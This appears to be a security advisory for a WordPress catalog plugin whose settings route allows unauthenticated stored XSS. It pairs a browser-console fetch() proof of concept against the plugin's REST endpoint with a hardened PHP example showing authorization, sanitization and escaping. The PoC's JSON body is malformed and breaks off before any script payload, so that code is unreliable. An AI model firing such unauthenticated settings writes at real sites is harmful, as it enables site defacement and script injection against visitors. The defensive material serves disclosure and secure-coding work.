Description
The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.
PoC
1) Make sure the plugin is configured with the "Catalog Mode" activated.
2) Launch the following from your browser's console:

```
fetch("http://vulnerable-site.tld/wp-json/mvx_catalog/v1/save_enquiry", {"headers": {"content-type": "application/json",}, "body": " {"model":{"from_loading":true,"statedrop":[],"errordisplay":"Settings Saved","complete_option_value":[],"button_type":{"value":"4","label":"No Link Just #","index":3},"is_button":["is_button"],"custom_hover_background_color":"#0}
```
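The two missing controls named in the description (authorization on the settings-update route, and escaping of stored settings when they are rendered) map onto specific WordPress mechanisms. The following is an added example written for this page, not the plugin's own code: a hardened REST route in the style WordPress core expects. The namespace `example-vendor/v1`, the option name `example_catalog_settings` and the rendering function are placeholders; the field names `errordisplay` and `custom_hover_background_color` are taken from the PoC payload above.

```php
<?php
/**
 * Added example (not the plugin's code): a settings endpoint with the
 * controls the advisory says are missing. Route namespace, option name and
 * the render function are placeholders chosen for illustration.
 */

// 1. Authorization: permission_callback decides who may call the route.
//    An unauthenticated caller (as in the PoC) has no capabilities, so
//    current_user_can() returns false and core answers 401/403 before the
//    callback runs.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example-vendor/v1', '/save-settings', array(
        'methods'             => 'POST',
        'callback'            => 'example_save_settings',
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'errordisplay' => array(
                'type'              => 'string',
                'required'          => true,
                // Strips tags and control characters before storage.
                'sanitize_callback' => 'sanitize_text_field',
            ),
            'custom_hover_background_color' => array(
                'type'              => 'string',
                'required'          => false,
                // Accept only a 6-digit hex colour literal; reject anything else.
                'validate_callback' => function ( $value ) {
                    return (bool) preg_match( '/^#[0-9a-fA-F]{6}$/', $value );
                },
            ),
        ),
    ) );
} );

// 2. Storage: only validated, sanitized values reach the options table.
function example_save_settings( WP_REST_Request $request ) {
    $settings = array(
        'errordisplay'                  => $request->get_param( 'errordisplay' ),
        'custom_hover_background_color' => $request->get_param( 'custom_hover_background_color' ),
    );
    update_option( 'example_catalog_settings', $settings );
    return rest_ensure_response( array( 'saved' => true ) );
}

// 3. Output escaping: stored values are escaped at the point of use, with the
//    escaper matching the context (attribute vs. element text), so a payload
//    that somehow reached the database still cannot become markup.
function example_render_enquiry_button() {
    $settings = get_option( 'example_catalog_settings', array() );
    $label    = isset( $settings['errordisplay'] ) ? $settings['errordisplay'] : '';
    $color    = isset( $settings['custom_hover_background_color'] )
        ? $settings['custom_hover_background_color']
        : '#ffffff';

    printf(
        '<button class="enquiry-button" style="background:%s">%s</button>',
        esc_attr( $color ),
        esc_html( $label )
    );
}
```

Two points are worth checking when reviewing a route like this. First, cookie-authenticated REST requests are only treated as logged in when they carry a valid `X-WP-Nonce` header; a request without one (the PoC sends none) runs as an anonymous user, which is exactly the case a `permission_callback` must reject. Second, sanitizing on input is not a substitute for escaping on output: the escaper has to match the context where the value is printed, which is why the colour goes through `esc_attr()` and the label through `esc_html()`.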